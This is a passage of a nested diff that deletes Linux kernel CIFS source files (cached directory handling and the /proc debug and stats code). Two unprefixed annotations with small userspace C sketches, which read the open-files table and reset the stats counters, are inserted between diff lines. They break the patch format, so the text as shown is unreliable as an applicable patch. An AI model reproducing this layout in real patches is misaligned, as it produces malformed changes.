+-				struct cached_fid, lease_break);
+-
+-	spin_lock(&cfid->cfids->cfid_list_lock);
+-	cfid->has_lease = false;
+-	spin_unlock(&cfid->cfids->cfid_list_lock);
+-	kref_put(&cfid->refcount, smb2_close_cached_fid);
+-}
+-
+-int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16])
+-{
+-	struct cached_fids *cfids = tcon->cfids;
+-	struct cached_fid *cfid;
+-
+-	if (cfids == NULL)
+-		return false;
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry(cfid, &cfids->entries, entry) {
+-		if (cfid->has_lease &&
+-		    !memcmp(lease_key,
+-			    cfid->fid.lease_key,
+-			    SMB2_LEASE_KEY_SIZE)) {
+-			cfid->time = 0;
+-			/*
+-			 * We found a lease; remove it from the list
+-			 * so no threads can access it.
+-			 */
+-			list_del(&cfid->entry);
+-			cfid->on_list = false;
+-			cfids->num_entries--;
+-
+-			queue_work(cifsiod_wq,
+-				   &cfid->lease_break);
+-			spin_unlock(&cfids->cfid_list_lock);
+-			return true;
+-		}
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-	return false;
+-}
+-
+-static struct cached_fid *init_cached_dir(const char *path)
+-{
+-	struct cached_fid *cfid;
+-
+-	cfid = kzalloc(sizeof(*cfid), GFP_ATOMIC);
+-	if (!cfid)
+-		return NULL;
+-	cfid->path = kstrdup(path, GFP_ATOMIC);
+-	if (!cfid->path) {
+-		kfree(cfid);
+-		return NULL;
+-	}
+-
+-	INIT_WORK(&cfid->lease_break, smb2_cached_lease_break);
+-	INIT_LIST_HEAD(&cfid->entry);
+-	INIT_LIST_HEAD(&cfid->dirents.entries);
+-	mutex_init(&cfid->dirents.de_mutex);
+-	spin_lock_init(&cfid->fid_lock);
+-	kref_init(&cfid->refcount);
+-	return cfid;
+-}
+-
+-static void free_cached_dir(struct cached_fid *cfid)
+-{
+-	struct cached_dirent *dirent, *q;
+-
+-	dput(cfid->dentry);
+-	cfid->dentry = NULL;
+-
+-	/*
+-	 * Delete all cached dirent names
+-	 */
+-	list_for_each_entry_safe(dirent, q, &cfid->dirents.entries, entry) {
+-		list_del(&dirent->entry);
+-		kfree(dirent->name);
+-		kfree(dirent);
+-	}
+-
+-	kfree(cfid->path);
+-	cfid->path = NULL;
+-	kfree(cfid);
+-}
+-
+-struct cached_fids *init_cached_dirs(void)
+-{
+-	struct cached_fids *cfids;
+-
+-	cfids = kzalloc(sizeof(*cfids), GFP_KERNEL);
+-	if (!cfids)
+-		return NULL;
+-	spin_lock_init(&cfids->cfid_list_lock);
+-	INIT_LIST_HEAD(&cfids->entries);
+-	return cfids;
+-}
+-
+-/*
+- * Called from tconInfoFree when we are tearing down the tcon.
+- * There are no active users or open files/directories at this point.
+- */
+-void free_cached_dirs(struct cached_fids *cfids)
+-{
+-	struct cached_fid *cfid, *q;
+-	LIST_HEAD(entry);
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
+-		cfid->on_list = false;
+-		cfid->is_open = false;
+-		list_move(&cfid->entry, &entry);
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-
+-	list_for_each_entry_safe(cfid, q, &entry, entry) {
+-		list_del(&cfid->entry);
+-		free_cached_dir(cfid);
+-	}
+-
+-	kfree(cfids);
+-}
+diff --git a/fs/cifs/cached_dir.h b/fs/cifs/cached_dir.h
+deleted file mode 100644
+index 2f4e764c9ca9a..0000000000000
+--- a/fs/cifs/cached_dir.h
++++ /dev/null
+@@ -1,80 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *  Functions to handle the cached directory entries
+- *
+- *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
+- */
+-
+-#ifndef _CACHED_DIR_H
+-#define _CACHED_DIR_H
+-
+-
+-struct cached_dirent {
+-	struct list_head entry;
+-	char *name;
+-	int namelen;
+-	loff_t pos;
+-
+-	struct cifs_fattr fattr;
+-};
+-
+-struct cached_dirents {
+-	bool is_valid:1;
+-	bool is_failed:1;
+-	struct dir_context *ctx; /*
+-				  * Only used to make sure we only take entries
+-				  * from a single context. Never dereferenced.
+-				  */
+-	struct mutex de_mutex;
+-	int pos;		 /* Expected ctx->pos */
+-	struct list_head entries;
+-};
+-
+-struct cached_fid {
+-	struct list_head entry;
+-	struct cached_fids *cfids;
+-	const char *path;
+-	bool has_lease:1;
+-	bool is_open:1;
+-	bool on_list:1;
+-	bool file_all_info_is_valid:1;
+-	unsigned long time; /* jiffies of when lease was taken */
+-	struct kref refcount;
+-	struct cifs_fid fid;
+-	spinlock_t fid_lock;
+-	struct cifs_tcon *tcon;
+-	struct dentry *dentry;
+-	struct work_struct lease_break;
+-	struct smb2_file_all_info file_all_info;
+-	struct cached_dirents dirents;
+-};
+-
+-#define MAX_CACHED_FIDS 16
+-struct cached_fids {
+-	/* Must be held when:
+-	 * - accessing the cfids->entries list
+-	 */
+-	spinlock_t cfid_list_lock;
+-	int num_entries;
+-	struct list_head entries;
+-};
+-
+-extern struct cached_fids *init_cached_dirs(void);
+-extern void free_cached_dirs(struct cached_fids *cfids);
+-extern int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+-			   const char *path,
+-			   struct cifs_sb_info *cifs_sb,
+-			   bool lookup_only, struct cached_fid **cfid);
+-extern int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
+-				     struct dentry *dentry,
+-				     struct cached_fid **cfid);
+-extern void close_cached_dir(struct cached_fid *cfid);
+-extern void drop_cached_dir_by_name(const unsigned int xid,
+-				    struct cifs_tcon *tcon,
+-				    const char *name,
+-				    struct cifs_sb_info *cifs_sb);
+-extern void close_all_cached_dirs(struct cifs_sb_info *cifs_sb);
+-extern void invalidate_all_cached_dirs(struct cifs_tcon *tcon);
+-extern int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16]);
+-
+-#endif			/* _CACHED_DIR_H */
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+deleted file mode 100644
+index e41154ad96afc..0000000000000
+--- a/fs/cifs/cifs_debug.c
++++ /dev/null
+@@ -1,1067 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2000,2005
+- *
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- */
+-#include <linux/fs.h>
+-#include <linux/string.h>
+-#include <linux/ctype.h>
+-#include <linux/module.h>
+-#include <linux/proc_fs.h>
+-#include <linux/uaccess.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifsfs.h"
+-#include "fs_context.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-#include "smbdirect.h"
+-#endif
+-#include "cifs_swn.h"
+-
+-void
+-cifs_dump_mem(char *label, void *data, int length)
+-{
+-	pr_debug("%s: dump of %d bytes of data at 0x%p\n", label, length, data);
+-	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_OFFSET, 16, 4,
+-		       data, length, true);
+-}
+-
+-void cifs_dump_detail(void *buf, struct TCP_Server_Info *server)
+-{
+-#ifdef CONFIG_CIFS_DEBUG2
+-	struct smb_hdr *smb = buf;
+-
+-	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d\n",
+-		 smb->Command, smb->Status.CifsError,
+-		 smb->Flags, smb->Flags2, smb->Mid, smb->Pid);
+-	cifs_dbg(VFS, "smb buf %p len %u\n", smb,
+-		 server->ops->calc_smb_size(smb));
+-#endif /* CONFIG_CIFS_DEBUG2 */
+-}
+-
+-void cifs_dump_mids(struct TCP_Server_Info *server)
+-{
+-#ifdef CONFIG_CIFS_DEBUG2
+-	struct mid_q_entry *mid_entry;
+-
+-	if (server == NULL)
+-		return;
+-
+-	cifs_dbg(VFS, "Dump pending requests:\n");
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-		cifs_dbg(VFS, "State: %d Cmd: %d Pid: %d Cbdata: %p Mid %llu\n",
+-			 mid_entry->mid_state,
+-			 le16_to_cpu(mid_entry->command),
+-			 mid_entry->pid,
+-			 mid_entry->callback_data,
+-			 mid_entry->mid);
+-#ifdef CONFIG_CIFS_STATS2
+-		cifs_dbg(VFS, "IsLarge: %d buf: %p time rcv: %ld now: %ld\n",
+-			 mid_entry->large_buf,
+-			 mid_entry->resp_buf,
+-			 mid_entry->when_received,
+-			 jiffies);
+-#endif /* STATS2 */
+-		cifs_dbg(VFS, "IsMult: %d IsEnd: %d\n",
+-			 mid_entry->multiRsp, mid_entry->multiEnd);
+-		if (mid_entry->resp_buf) {
+-			cifs_dump_detail(mid_entry->resp_buf, server);
+-			cifs_dump_mem("existing buf: ",
+-				mid_entry->resp_buf, 62);
+-		}
+-	}
+-	spin_unlock(&server->mid_lock);
+-#endif /* CONFIG_CIFS_DEBUG2 */
+-}
+-
+-#ifdef CONFIG_PROC_FS
+-static void cifs_debug_tcon(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	__u32 dev_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
+-
+-	seq_printf(m, "%s Mounts: %d ", tcon->tree_name, tcon->tc_count);
+-	if (tcon->nativeFileSystem)
+-		seq_printf(m, "Type: %s ", tcon->nativeFileSystem);
+-	seq_printf(m, "DevInfo: 0x%x Attributes: 0x%x\n\tPathComponentMax: %d Status: %d",
+-		   le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics),
+-		   le32_to_cpu(tcon->fsAttrInfo.Attributes),
+-		   le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength),
+-		   tcon->status);
+-	if (dev_type == FILE_DEVICE_DISK)
+-		seq_puts(m, " type: DISK ");
+-	else if (dev_type == FILE_DEVICE_CD_ROM)
+-		seq_puts(m, " type: CDROM ");
+-	else
+-		seq_printf(m, " type: %d ", dev_type);
+-
+-	seq_printf(m, "Serial Number: 0x%x", tcon->vol_serial_number);
+-
+-	if ((tcon->seal) ||
+-	    (tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
+-	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
+-		seq_printf(m, " Encrypted");
+-	if (tcon->nocase)
+-		seq_printf(m, " nocase");
+-	if (tcon->unix_ext)
+-		seq_printf(m, " POSIX Extensions");
+-	if (tcon->ses->server->ops->dump_share_caps)
+-		tcon->ses->server->ops->dump_share_caps(m, tcon);
+-	if (tcon->use_witness)
+-		seq_puts(m, " Witness");
+-	if (tcon->broken_sparse_sup)
+-		seq_puts(m, " nosparse");
+-	if (tcon->need_reconnect)
+-		seq_puts(m, "\tDISCONNECTED ");
+-	seq_putc(m, '\n');
+-}
+-
+-static void
+-cifs_dump_channel(struct seq_file *m, int i, struct cifs_chan *chan)
+-{
+-	struct TCP_Server_Info *server = chan->server;
+-
+-	seq_printf(m, "\n\n\t\tChannel: %d ConnectionId: 0x%llx"
+-		   "\n\t\tNumber of credits: %d Dialect 0x%x"
+-		   "\n\t\tTCP status: %d Instance: %d"
+-		   "\n\t\tLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d"
+-		   "\n\t\tIn Send: %d In MaxReq Wait: %d",
+-		   i+1, server->conn_id,
+-		   server->credits,
+-		   server->dialect,
+-		   server->tcpStatus,
+-		   server->reconnect_instance,
+-		   server->srv_count,
+-		   server->sec_mode,
+-		   in_flight(server),
+-		   atomic_read(&server->in_send),
+-		   atomic_read(&server->num_waiters));
+-}
+-
+-static void
+-cifs_dump_iface(struct seq_file *m, struct cifs_server_iface *iface)
+-{
+-	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
+-	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
+-
+-	seq_printf(m, "\tSpeed: %zu bps\n", iface->speed);
+-	seq_puts(m, "\t\tCapabilities: ");
+-	if (iface->rdma_capable)
+-		seq_puts(m, "rdma ");
+-	if (iface->rss_capable)
+-		seq_puts(m, "rss ");
+-	seq_putc(m, '\n');
+-	if (iface->sockaddr.ss_family == AF_INET)
+-		seq_printf(m, "\t\tIPv4: %pI4\n", &ipv4->sin_addr);
+-	else if (iface->sockaddr.ss_family == AF_INET6)
+-		seq_printf(m, "\t\tIPv6: %pI6\n", &ipv6->sin6_addr);
+-	if (!iface->is_active)
+-		seq_puts(m, "\t\t[for-cleanup]\n");
+-}
+-
+-static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+-{
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-
+-	seq_puts(m, "# Version:1\n");
+-	seq_puts(m, "# Format:\n");
+-	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
+-#ifdef CONFIG_CIFS_DEBUG2
+-	seq_printf(m, " <filename> <mid>\n");
+-#else
+-	seq_printf(m, " <filename>\n");
+-#endif /* CIFS_DEBUG2 */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				spin_lock(&tcon->open_file_lock);
+-				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-					seq_printf(m,
+-						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
+-						tcon->tid,
+-						ses->Suid,
+-						cfile->fid.persistent_fid,
+-						cfile->f_flags,
+-						cfile->count,
+-						cfile->pid,
+-						from_kuid(&init_user_ns, cfile->uid),
+-						cfile->dentry);
+-#ifdef CONFIG_CIFS_DEBUG2
+-					seq_printf(m, " %llu\n", cfile->fid.mid);
+-#else
+-					seq_printf(m, "\n");
+-#endif /* CIFS_DEBUG2 */
+-				}
+-				spin_unlock(&tcon->open_file_lock);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	seq_putc(m, '\n');
+-	return 0;
+-}
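
A minimal userspace consumer of the open_files table produced above,
assuming a CIFS mount and CONFIG_PROC_FS (sketch only):

	#include <stdio.h>

	int main(void)
	{
		char line[512];
		FILE *f = fopen("/proc/fs/cifs/open_files", "r");

		if (!f) {
			perror("/proc/fs/cifs/open_files");
			return 1;
		}
		while (fgets(line, sizeof(line), f))
			fputs(line, stdout);	/* one record per open file */
		fclose(f);
		return 0;
	}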
+-
+-static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+-{
+-	struct mid_q_entry *mid_entry;
+-	struct TCP_Server_Info *server;
+-	struct TCP_Server_Info *chan_server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifs_server_iface *iface;
+-	int c, i, j;
+-
+-	seq_puts(m,
+-		    "Display Internal CIFS Data Structures for Debugging\n"
+-		    "---------------------------------------------------\n");
+-	seq_printf(m, "CIFS Version %s\n", CIFS_VERSION);
+-	seq_printf(m, "Features:");
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	seq_printf(m, " DFS");
+-#endif
+-#ifdef CONFIG_CIFS_FSCACHE
+-	seq_printf(m, ",FSCACHE");
+-#endif
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	seq_printf(m, ",SMB_DIRECT");
+-#endif
+-#ifdef CONFIG_CIFS_STATS2
+-	seq_printf(m, ",STATS2");
+-#else
+-	seq_printf(m, ",STATS");
+-#endif
+-#ifdef CONFIG_CIFS_DEBUG2
+-	seq_printf(m, ",DEBUG2");
+-#elif defined(CONFIG_CIFS_DEBUG)
+-	seq_printf(m, ",DEBUG");
+-#endif
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	seq_printf(m, ",ALLOW_INSECURE_LEGACY");
+-#endif
+-#ifdef CONFIG_CIFS_POSIX
+-	seq_printf(m, ",CIFS_POSIX");
+-#endif
+-#ifdef CONFIG_CIFS_UPCALL
+-	seq_printf(m, ",UPCALL(SPNEGO)");
+-#endif
+-#ifdef CONFIG_CIFS_XATTR
+-	seq_printf(m, ",XATTR");
+-#endif
+-	seq_printf(m, ",ACL");
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	seq_puts(m, ",WITNESS");
+-#endif
+-	seq_putc(m, '\n');
+-	seq_printf(m, "CIFSMaxBufSize: %d\n", CIFSMaxBufSize);
+-	seq_printf(m, "Active VFS Requests: %d\n", GlobalTotalActiveXid);
+-
+-	seq_printf(m, "\nServers: ");
+-
+-	c = 0;
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		/* channel info will be printed as a part of sessions below */
+-		if (CIFS_SERVER_IS_CHAN(server))
+-			continue;
+-
+-		c++;
+-		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
+-			c, server->conn_id);
+-
+-		spin_lock(&server->srv_lock);
+-		if (server->hostname)
+-			seq_printf(m, "Hostname: %s ", server->hostname);
+-		spin_unlock(&server->srv_lock);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-		if (!server->rdma)
+-			goto skip_rdma;
+-
+-		if (!server->smbd_conn) {
+-			seq_printf(m, "\nSMBDirect transport not available");
+-			goto skip_rdma;
+-		}
+-
+-		seq_printf(m, "\nSMBDirect (in hex) protocol version: %x "
+-			"transport status: %x",
+-			server->smbd_conn->protocol,
+-			server->smbd_conn->transport_status);
+-		seq_printf(m, "\nConn receive_credit_max: %x "
+-			"send_credit_target: %x max_send_size: %x",
+-			server->smbd_conn->receive_credit_max,
+-			server->smbd_conn->send_credit_target,
+-			server->smbd_conn->max_send_size);
+-		seq_printf(m, "\nConn max_fragmented_recv_size: %x "
+-			"max_fragmented_send_size: %x max_receive_size:%x",
+-			server->smbd_conn->max_fragmented_recv_size,
+-			server->smbd_conn->max_fragmented_send_size,
+-			server->smbd_conn->max_receive_size);
+-		seq_printf(m, "\nConn keep_alive_interval: %x "
+-			"max_readwrite_size: %x rdma_readwrite_threshold: %x",
+-			server->smbd_conn->keep_alive_interval,
+-			server->smbd_conn->max_readwrite_size,
+-			server->smbd_conn->rdma_readwrite_threshold);
+-		seq_printf(m, "\nDebug count_get_receive_buffer: %x "
+-			"count_put_receive_buffer: %x count_send_empty: %x",
+-			server->smbd_conn->count_get_receive_buffer,
+-			server->smbd_conn->count_put_receive_buffer,
+-			server->smbd_conn->count_send_empty);
+-		seq_printf(m, "\nRead Queue count_reassembly_queue: %x "
+-			"count_enqueue_reassembly_queue: %x "
+-			"count_dequeue_reassembly_queue: %x "
+-			"fragment_reassembly_remaining: %x "
+-			"reassembly_data_length: %x "
+-			"reassembly_queue_length: %x",
+-			server->smbd_conn->count_reassembly_queue,
+-			server->smbd_conn->count_enqueue_reassembly_queue,
+-			server->smbd_conn->count_dequeue_reassembly_queue,
+-			server->smbd_conn->fragment_reassembly_remaining,
+-			server->smbd_conn->reassembly_data_length,
+-			server->smbd_conn->reassembly_queue_length);
+-		seq_printf(m, "\nCurrent Credits send_credits: %x "
+-			"receive_credits: %x receive_credit_target: %x",
+-			atomic_read(&server->smbd_conn->send_credits),
+-			atomic_read(&server->smbd_conn->receive_credits),
+-			server->smbd_conn->receive_credit_target);
+-		seq_printf(m, "\nPending send_pending: %x ",
+-			atomic_read(&server->smbd_conn->send_pending));
+-		seq_printf(m, "\nReceive buffers count_receive_queue: %x "
+-			"count_empty_packet_queue: %x",
+-			server->smbd_conn->count_receive_queue,
+-			server->smbd_conn->count_empty_packet_queue);
+-		seq_printf(m, "\nMR responder_resources: %x "
+-			"max_frmr_depth: %x mr_type: %x",
+-			server->smbd_conn->responder_resources,
+-			server->smbd_conn->max_frmr_depth,
+-			server->smbd_conn->mr_type);
+-		seq_printf(m, "\nMR mr_ready_count: %x mr_used_count: %x",
+-			atomic_read(&server->smbd_conn->mr_ready_count),
+-			atomic_read(&server->smbd_conn->mr_used_count));
+-skip_rdma:
+-#endif
+-		seq_printf(m, "\nNumber of credits: %d Dialect 0x%x",
+-			server->credits,  server->dialect);
+-		if (server->compress_algorithm == SMB3_COMPRESS_LZNT1)
+-			seq_printf(m, " COMPRESS_LZNT1");
+-		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77)
+-			seq_printf(m, " COMPRESS_LZ77");
+-		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77_HUFF)
+-			seq_printf(m, " COMPRESS_LZ77_HUFF");
+-		if (server->sign)
+-			seq_printf(m, " signed");
+-		if (server->posix_ext_supported)
+-			seq_printf(m, " posix");
+-		if (server->nosharesock)
+-			seq_printf(m, " nosharesock");
+-
+-		if (server->rdma)
+-			seq_printf(m, "\nRDMA ");
+-		seq_printf(m, "\nTCP status: %d Instance: %d"
+-				"\nLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d",
+-				server->tcpStatus,
+-				server->reconnect_instance,
+-				server->srv_count,
+-				server->sec_mode, in_flight(server));
+-
+-		seq_printf(m, "\nIn Send: %d In MaxReq Wait: %d",
+-				atomic_read(&server->in_send),
+-				atomic_read(&server->num_waiters));
+-
+-		seq_printf(m, "\n\n\tSessions: ");
+-		i = 0;
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			i++;
+-			if ((ses->serverDomain == NULL) ||
+-				(ses->serverOS == NULL) ||
+-				(ses->serverNOS == NULL)) {
+-				seq_printf(m, "\n\t%d) Address: %s Uses: %d Capability: 0x%x\tSession Status: %d ",
+-					i, ses->ip_addr, ses->ses_count,
+-					ses->capabilities, ses->ses_status);
+-				if (ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
+-					seq_printf(m, "Guest ");
+-				else if (ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
+-					seq_printf(m, "Anonymous ");
+-			} else {
+-				seq_printf(m,
+-				    "\n\t%d) Name: %s  Domain: %s Uses: %d OS: %s "
+-				    "\n\tNOS: %s\tCapability: 0x%x"
+-					"\n\tSMB session status: %d ",
+-				i, ses->ip_addr, ses->serverDomain,
+-				ses->ses_count, ses->serverOS, ses->serverNOS,
+-				ses->capabilities, ses->ses_status);
+-			}
+-
+-			seq_printf(m, "\n\tSecurity type: %s ",
+-				get_security_type_str(server->ops->select_sectype(server, ses->sectype)));
+-
+-			/* dump session id helpful for use with network trace */
+-			seq_printf(m, " SessionId: 0x%llx", ses->Suid);
+-			if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
+-				seq_puts(m, " encrypted");
+-			if (ses->sign)
+-				seq_puts(m, " signed");
+-
+-			seq_printf(m, "\n\tUser: %d Cred User: %d",
+-				   from_kuid(&init_user_ns, ses->linux_uid),
+-				   from_kuid(&init_user_ns, ses->cred_uid));
+-
+-			spin_lock(&ses->chan_lock);
+-			if (CIFS_CHAN_NEEDS_RECONNECT(ses, 0))
+-				seq_puts(m, "\tPrimary channel: DISCONNECTED ");
+-			if (CIFS_CHAN_IN_RECONNECT(ses, 0))
+-				seq_puts(m, "\t[RECONNECTING] ");
+-
+-			if (ses->chan_count > 1) {
+-				seq_printf(m, "\n\n\tExtra Channels: %zu ",
+-					   ses->chan_count-1);
+-				for (j = 1; j < ses->chan_count; j++) {
+-					cifs_dump_channel(m, j, &ses->chans[j]);
+-					if (CIFS_CHAN_NEEDS_RECONNECT(ses, j))
+-						seq_puts(m, "\tDISCONNECTED ");
+-					if (CIFS_CHAN_IN_RECONNECT(ses, j))
+-						seq_puts(m, "\t[RECONNECTING] ");
+-				}
+-			}
+-			spin_unlock(&ses->chan_lock);
+-
+-			seq_puts(m, "\n\n\tShares: ");
+-			j = 0;
+-
+-			seq_printf(m, "\n\t%d) IPC: ", j);
+-			if (ses->tcon_ipc)
+-				cifs_debug_tcon(m, ses->tcon_ipc);
+-			else
+-				seq_puts(m, "none\n");
+-
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				++j;
+-				seq_printf(m, "\n\t%d) ", j);
+-				cifs_debug_tcon(m, tcon);
+-			}
+-
+-			spin_lock(&ses->iface_lock);
+-			if (ses->iface_count)
+-				seq_printf(m, "\n\n\tServer interfaces: %zu",
+-					   ses->iface_count);
+-			j = 0;
+-			list_for_each_entry(iface, &ses->iface_list,
+-						 iface_head) {
+-				seq_printf(m, "\n\t%d)", ++j);
+-				cifs_dump_iface(m, iface);
+-				if (is_ses_using_iface(ses, iface))
+-					seq_puts(m, "\t\t[CONNECTED]\n");
+-			}
+-			spin_unlock(&ses->iface_lock);
+-
+-			seq_puts(m, "\n\n\tMIDs: ");
+-			spin_lock(&ses->chan_lock);
+-			for (j = 0; j < ses->chan_count; j++) {
+-				chan_server = ses->chans[j].server;
+-				if (!chan_server)
+-					continue;
+-
+-				if (list_empty(&chan_server->pending_mid_q))
+-					continue;
+-
+-				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
+-					   chan_server->conn_id);
+-				spin_lock(&chan_server->mid_lock);
+-				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
+-					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
+-						   mid_entry->mid_state,
+-						   le16_to_cpu(mid_entry->command),
+-						   mid_entry->pid,
+-						   mid_entry->callback_data,
+-						   mid_entry->mid);
+-				}
+-				spin_unlock(&chan_server->mid_lock);
+-			}
+-			spin_unlock(&ses->chan_lock);
+-			seq_puts(m, "\n--\n");
+-		}
+-		if (i == 0)
+-			seq_printf(m, "\n\t\t[NONE]");
+-	}
+-	if (c == 0)
+-		seq_printf(m, "\n\t[NONE]");
+-
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	seq_putc(m, '\n');
+-	cifs_swn_dump(m);
+-
+-	/* BB add code to dump additional info such as TCP session info now */
+-	return 0;
+-}
+-
+-static ssize_t cifs_stats_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	bool bv;
+-	int rc;
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	rc = kstrtobool_from_user(buffer, count, &bv);
+-	if (rc == 0) {
+-#ifdef CONFIG_CIFS_STATS2
+-		int i;
+-
+-		atomic_set(&total_buf_alloc_count, 0);
+-		atomic_set(&total_small_buf_alloc_count, 0);
+-#endif /* CONFIG_CIFS_STATS2 */
+-		atomic_set(&tcpSesReconnectCount, 0);
+-		atomic_set(&tconInfoReconnectCount, 0);
+-
+-		spin_lock(&GlobalMid_Lock);
+-		GlobalMaxActiveXid = 0;
+-		GlobalCurrentXid = 0;
+-		spin_unlock(&GlobalMid_Lock);
+-		spin_lock(&cifs_tcp_ses_lock);
+-		list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-			server->max_in_flight = 0;
+-#ifdef CONFIG_CIFS_STATS2
+-			for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
+-				atomic_set(&server->num_cmds[i], 0);
+-				atomic_set(&server->smb2slowcmd[i], 0);
+-				server->time_per_cmd[i] = 0;
+-				server->slowest_cmd[i] = 0;
+-				server->fastest_cmd[i] = 0;
+-			}
+-#endif /* CONFIG_CIFS_STATS2 */
+-			list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-				list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-					atomic_set(&tcon->num_smbs_sent, 0);
+-					spin_lock(&tcon->stat_lock);
+-					tcon->bytes_read = 0;
+-					tcon->bytes_written = 0;
+-					spin_unlock(&tcon->stat_lock);
+-					if (server->ops->clear_stats)
+-						server->ops->clear_stats(tcon);
+-				}
+-			}
+-		}
+-		spin_unlock(&cifs_tcp_ses_lock);
+-	} else {
+-		return rc;
+-	}
+-
+-	return count;
+-}
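
Note that the reset above runs whenever the parse succeeds: the boolean
value itself is never consulted, so any token kstrtobool accepts ("1",
"0", "y", "n", ...) clears the counters. A minimal userspace trigger,
assuming the cifs module is loaded (sketch only):

	#include <stdio.h>

	int main(void)
	{
		FILE *f = fopen("/proc/fs/cifs/Stats", "w");

		if (!f) {
			perror("/proc/fs/cifs/Stats");
			return 1;
		}
		fputs("1\n", f);	/* resets all per-server/tcon stats */
		return fclose(f) ? 1 : 0;
	}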
+-
+-static int cifs_stats_proc_show(struct seq_file *m, void *v)
+-{
+-	int i;
+-#ifdef CONFIG_CIFS_STATS2
+-	int j;
+-#endif /* STATS2 */
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	seq_printf(m, "Resources in use\nCIFS Session: %d\n",
+-			sesInfoAllocCount.counter);
+-	seq_printf(m, "Share (unique mount targets): %d\n",
+-			tconInfoAllocCount.counter);
+-	seq_printf(m, "SMB Request/Response Buffer: %d Pool size: %d\n",
+-			buf_alloc_count.counter,
+-			cifs_min_rcv + tcpSesAllocCount.counter);
+-	seq_printf(m, "SMB Small Req/Resp Buffer: %d Pool size: %d\n",
+-			small_buf_alloc_count.counter, cifs_min_small);
+-#ifdef CONFIG_CIFS_STATS2
+-	seq_printf(m, "Total Large %d Small %d Allocations\n",
+-				atomic_read(&total_buf_alloc_count),
+-				atomic_read(&total_small_buf_alloc_count));
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	seq_printf(m, "Operations (MIDs): %d\n", atomic_read(&mid_count));
+-	seq_printf(m,
+-		"\n%d session %d share reconnects\n",
+-		tcpSesReconnectCount.counter, tconInfoReconnectCount.counter);
+-
+-	seq_printf(m,
